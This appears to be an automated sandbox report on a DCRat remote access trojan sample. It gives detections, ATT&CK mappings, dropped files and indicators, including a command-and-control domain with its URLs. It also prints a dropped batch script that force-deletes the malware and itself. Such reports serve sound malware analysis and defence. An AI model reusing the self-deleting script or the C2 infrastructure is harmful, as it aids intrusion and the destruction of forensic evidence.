                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: 0_2_00F5B884 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F5B884
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected DCRat
                  Source: Yara matchFile source: 3.0.ms_updater.exe.d90000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.1hibLFnCm1.exe.f50000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000000.1699967680.0000000000D92000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1759262008.000000000314B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 1hibLFnCm1.exe PID: 6532, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ms_updater.exe PID: 6768, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\ms_updater.exe, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Yara detected DCRat
                  Source: Yara matchFile source: 3.0.ms_updater.exe.d90000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.1hibLFnCm1.exe.f50000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000000.1699967680.0000000000D92000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1759262008.000000000314B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 1hibLFnCm1.exe PID: 6532, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ms_updater.exe PID: 6768, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\ms_updater.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		Valid Accounts1
                  Native API                  		1
                  Scripting                  		12
                  Process Injection                  		11
                  Masquerading                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		LSASS Memory221
                  Security Software Discovery                  		Remote Desktop Protocol1
                  Clipboard Data                  		2
                  Non-Application Layer Protocol                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
                  Virtualization/Sandbox Evasion                  		Security Account Manager2
                  Process Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive12
                  Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                  Process Injection                  		NTDS131
                  Virtualization/Sandbox Evasion                  		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                  Deobfuscate/Decode Files or Information                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Obfuscated Files or Information                  		Cached Domain Credentials2
                  File and Directory Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Software Packing                  		DCSync135
                  System Information Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466966 Sample: 1hibLFnCm1.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 39 118621cm.n9shteam2.top 2->39 43 Snort IDS alert for network traffic 2->43 45 Antivirus detection for URL or domain 2->45 47 Antivirus detection for dropped file 2->47 49 5 other signatures 2->49 9 1hibLFnCm1.exe 3 2->9         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\ms_updater.exe, PE32 9->29 dropped 31 C:\Users\user\AppData\Roaming\ms_tool.exe, PE32+ 9->31 dropped 12 ms_updater.exe 19 8 9->12         started        17 ms_tool.exe 1 9->17         started        process6 dnsIp7 41 118621cm.n9shteam2.top 104.21.90.190, 49730, 49731, 49732 CLOUDFLARENETUS United States 12->41 33 C:\Users\user\Desktop\mHYqxgSr.log, PE32 12->33 dropped 35 C:\Users\user\Desktop\gOvRVAND.log, PE32 12->35 dropped 37 C:\Users\user\AppData\...\jClCs9nEU3.bat, DOS 12->37 dropped 51 Antivirus detection for dropped file 12->51 53 Multi AV Scanner detection for dropped file 12->53 55 Machine Learning detection for dropped file 12->55 57 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 12->57 19 cmd.exe 1 12->19         started        21 conhost.exe 17->21         started        file8 signatures9 process10 process11 23 w32tm.exe 1 19->23         started        25 conhost.exe 19->25         started        27 chcp.com 1 19->27         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  1hibLFnCm1.exe71%ReversingLabsWin32.Trojan.Zusy
                  1hibLFnCm1.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\jClCs9nEU3.bat100%AviraBAT/Delbat.C
                  C:\Users\user\Desktop\gOvRVAND.log100%AviraHEUR/AGEN.1300079
                  C:\Users\user\AppData\Roaming\ms_updater.exe100%AviraHEUR/AGEN.1309961
                  C:\Users\user\AppData\Roaming\ms_updater.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\ms_tool.exe0%ReversingLabs
                  C:\Users\user\AppData\Roaming\ms_updater.exe88%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                  C:\Users\user\Desktop\gOvRVAND.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                  C:\Users\user\Desktop\mHYqxgSr.log6%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
                  http://www.fontbureau.com0%URL Reputationsafe
                  http://www.fontbureau.com/designersG0%URL Reputationsafe
                  http://www.fontbureau.com/designers/?0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.fontbureau.com/designers?0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.fontbureau.com/designers0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.fontbureau.com/designers80%URL Reputationsafe
                  http://www.fonts.com0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://118621cm.n9shteam2.top/100%Avira URL Cloudmalware
                  http://118621cm.n9shteam2.top/protecttrackDatalifePrivateCentral.php100%Avira URL Cloudmalware
                  http://118621cm.n9shteX0%Avira URL Cloudsafe
                  http://118621cm.n9shteam2.top100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  118621cm.n9shteam2.top
                  		104.21.90.190
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://118621cm.n9shteam2.top/protecttrackDatalifePrivateCentral.phptrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://118621cm.n9shteam2.top/ms_updater.exe, 00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.comms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designersGms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/?ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cn/bThems_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers?ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.tiro.comms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designersms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.goodfont.co.krms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.carterandcone.comlms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sajatypeworks.comms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.typography.netDms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/cabarga.htmlNms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cn/cThems_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://118621cm.n9shteXms_updater.exe, 00000003.00000002.1759262008.00000000033A6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.galapagosdesign.com/staff/dennis.htmms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cnms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/frere-user.htmlms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.jiyu-kobo.co.jp/ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.galapagosdesign.com/DPleasems_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers8ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://118621cm.n9shteam2.topms_updater.exe, 00000003.00000002.1759262008.00000000030D6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.fonts.comms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sandoll.co.krms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.urwpp.deDPleasems_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.zhongyicts.com.cnms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namems_updater.exe, 00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sakkal.comms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    104.21.90.190
                    		118621cm.n9shteam2.topUnited States
                    		13335CLOUDFLARENETUStrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1466966
                    Start date and time:2024-07-03 15:51:09 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 3s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:14
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:1hibLFnCm1.exe
                    renamed because original name is a hash value
                    Original Sample Name:2196EDD4AD9D7E8CA345339A66E2FED5.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@13/8@1/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 68%
                    • Number of executed functions: 150
                    • Number of non-executed functions: 59
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • VT rate limit hit for: 1hibLFnCm1.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    09:52:06API Interceptor19x Sleep call for process: ms_updater.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    104.21.90.190sA74WsR0pQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                    • 235566cm.n9shteam2.top/JsupdatedefaultTrafficCentral.php
                    OhfDz9BBR9.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                    • 751120cm.n9shteam2.top/TorequestAuthlongpollServerSqlasyncuniversalPublic.php
                    yxyZx5FFRS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                    • 044913cm.n9shteam2.top/eternalProtectdefault.php
                    0okjnm1gOR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                    • 055442cm.n9shteam2.top/EternalpollProtectTrafficWordpressLocaltempdownloads.php
                    DCRatBuild(1).exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                    • 796367cm.n9shteam2.top/ProvidervideoPythondefaultPrivate.php
                    T7Em03jTPA.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                    • 550515cm.n9shteam2.top/eternalUpdatebigloaduniversalDatalife.php
                    YLICY3GBmX.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                    • 842614cm.n9shteam2.top/videosecureasyncDatalifeUploads.php
                    SecuriteInfo.com.HEUR.Trojan.MSIL.Agent.gen.4285.13890.exeGet hashmaliciousDCRatBrowse
                    • 739668cm.n9shteam2.top/ImagegeoapiMultiBaselinuxTrackTempuploads.php
                    b2BVDCUwAF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                    • 421820cm.n9shteam2.top/eternalPythonrequestPollbaseasyncGeneratorwpDlePublic.php

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    CLOUDFLARENETUSbeK7HmoXro.exeGet hashmaliciousUnknownBrowse
                    • 104.16.184.241
                    https://uglb4.roperelo.com/caGPey/Get hashmaliciousUnknownBrowse
                    • 104.17.2.184
                    tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 104.26.13.205
                    https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//maansaa.com/new/auth//xp8tpwsulfhjn/%2F/YW5keS5ncmVmcmF0aEBrcHMuY29tGet hashmaliciousHTMLPhisherBrowse
                    • 104.17.2.184
                    19808bS58f.exeGet hashmaliciousAgentTeslaBrowse
                    • 172.67.74.152
                    SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.6737.3783.exeGet hashmaliciousAgentTeslaBrowse
                    • 104.26.13.205
                    https://url7304.disco-mailer.net/ls/click?upn=u001.DWLeRfOXStcSaUNphm6ZnGquuezyvOF0FIuLMCSCrIQ9t3e8n3fjexKHJjVTV-2BQUFT1dnxR3BcyXaxz-2BblhjX71zswvTIlAGm31luuFhJgeOGXb3dn9Itq74-2Fe-2BlKg-2Bs0-2F4odRns7kSdvfqBhyqSbrYsnPmx4SeDwlRdlhHbM3UucitnipcwJ1gR7h8DzOIUWsvEslHUA8FsNTNWtsq3Q-2FU-2FPeBtGbo-2Fx3kgcXxAZuE-3DPmkq_5KlZmZKASPtIpYbHU6HHQmxS-2FHe3g010GX01BBBmlalJnMdBClXoEYQADKPWInqgHw-2B5921oa-2Fum9DxIHV8wgOarlsOnYJwzp6I2lNDfeCQdFcL55956QetBM0U9iihLLCXzc7MWVFcQDUwnaU8PUgQFrTwK63nQhJu8ngVllYSJR-2BUamfX7Ej8Gpp4vMWsL8t65JTtpjdFVQ36IgP-2B2LxLYSj9SfdmLAt97TCVXHWn7xANKqYpl-2BYx09SetkszDOjJuUV9L9bqZ-2FbmClOsUrPLylG74RJ8zQAREr7-2BUktmlWKoc8C7oqqTOKv340mZnTc-2FztCVjFgPMm1Bz5lR5AptUVEvvSBboXVGluKKoNkkMFkS-2BmNybyD3Aa-2BX8UZ5sGet hashmaliciousHTMLPhisherBrowse
                    • 188.114.96.3
                    https://www.evernote.com/shard/s371/sh/f041cc04-2eb8-11e1-1279-c0c24914207a/LWhD3rgdQ5xR5t--iDOJ7P-MUkYVUhgRq62dC8LVzLZOnctWRKJm5hEzqgGet hashmaliciousHTMLPhisherBrowse
                    • 1.1.1.1
                    GA4vpVYBVP.exeGet hashmaliciousDBatLoader, FormBookBrowse
                    • 172.67.145.203
                    RR1h1iO6W2.exeGet hashmaliciousFormBookBrowse
                    • 188.114.97.3

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Users\user\Desktop\gOvRVAND.logVg46FzGtNo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                      hZE4solQRQ.exeGet hashmaliciousDCRatBrowse
                        AK4VPeDc0M.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                          6Z4Q4bREii.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                            a6zbacl43h.exeGet hashmaliciousDCRatBrowse
                              BbaXbvOA7D.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                cL7A9wGE3w.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                  j05KsN2280.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    2lR1Spui9w.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      b8khu7cOny.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        C:\Users\user\AppData\Roaming\ms_tool.exestandlose plus.exeGet hashmaliciousDCRatBrowse
                                          6lmWSYhtHT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            GlhUEXoa8D.exeGet hashmaliciousDCRat, PureLog StealerBrowse
                                              47VcV3MNuc.exeGet hashmaliciousDCRatBrowse
                                                8JUrnD9NeY.exeGet hashmaliciousDCRatBrowse
                                                  SL3qvfqA8t.exeGet hashmaliciousDCRatBrowse

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ms_updater.exe.log

                                                    Download File
                                                    Process:C:\Users\user\AppData\Roaming\ms_updater.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):1740
                                                    Entropy (8bit):5.36827240602657
                                                    Encrypted:false
                                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKk+HKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKk+qZ4vtpv
                                                    MD5:1152A0332636E97D888ECFF02C1B19A9
                                                    SHA1:365D4052647A8B9BCC0512CBCFB12279316549FD
                                                    SHA-256:C72695BD822EB0EB112850B84D7ABBD5BADF07C3A0A670422D9DA3620BAE6EB4
                                                    SHA-512:9FFC281DBF24C21DDEC4BE93941339B7601AD12C24D11176668DBDFD0AD5826FDA463620BF9E129030D9119BF9A9E21C45A999F31249AA9BD65B85546783AD28
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                    C:\Users\user\AppData\Local\Temp\LLzNk9wqw6

                                                    Download File
                                                    Process:C:\Users\user\AppData\Roaming\ms_updater.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):25
                                                    Entropy (8bit):4.4838561897747224
                                                    Encrypted:false
                                                    SSDEEP:3:GxC3GLIbVTn:GxCsyTn
                                                    MD5:A795B06925AF161176CDEF580E5FA14B
                                                    SHA1:84EABE55FBF43684747F8E2027B3EA377BBC7ACC
                                                    SHA-256:685D6D937BE665F7E526EB51684F33CC7B0950B8B7E2683BCE4CB7D39DECFFC3
                                                    SHA-512:03E0E2D15D91AF5380183E0917F7B2ED7690EFE6C30D9E86C40BA648BE16DDDF8CC30DD3911D12BE93E117974602FE387BDA086060E7E96F29198591A1D6CC00
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:DfNUvaZEhgV5CcnmAdRNKxcY6

                                                    C:\Users\user\AppData\Local\Temp\jClCs9nEU3.bat

                                                    Download File
                                                    Process:C:\Users\user\AppData\Roaming\ms_updater.exe
                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):225
                                                    Entropy (8bit):5.058654544935388
                                                    Encrypted:false
                                                    SSDEEP:6:hCijTg3Nou1ShCZG1wknaZ54hKOZG1wkn23fZh:HTg9uyrHgf3
                                                    MD5:EDDB6633A7759841AF7FDB6EB30A0814
                                                    SHA1:CB8BEEB56E2DFE3E2081E21E1C6A3F2FEF69536E
                                                    SHA-256:7194CA4622E5A75CA2CEE06C7C55BE52AA674734B8D583B98273E5745B7F0721
                                                    SHA-512:0BBFEB843BEF1AEF04F6C23BC569CAC1F9DA6B55B5963354C502951053F41CA0AD8B46D07D09BE16BC8A47356AF8E0FF37D97C237104761C2AB3E6AE865FD51A
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    Reputation:low
                                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..del /a /q /f "C:\Users\user\AppData\Roaming\ms_updater.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\jClCs9nEU3.bat"

                                                    C:\Users\user\AppData\Roaming\ms_tool.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\1hibLFnCm1.exe
                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):18944
                                                    Entropy (8bit):5.181595394449682
                                                    Encrypted:false
                                                    SSDEEP:384:abquDyuX3PMD1A77ciNqC/Elsrl+0+/QlDIINvB0WLFW:gquuuHPMDinDY9al+0WQFNvBZ
                                                    MD5:F3EDFF85DE5FD002692D54A04BCB1C09
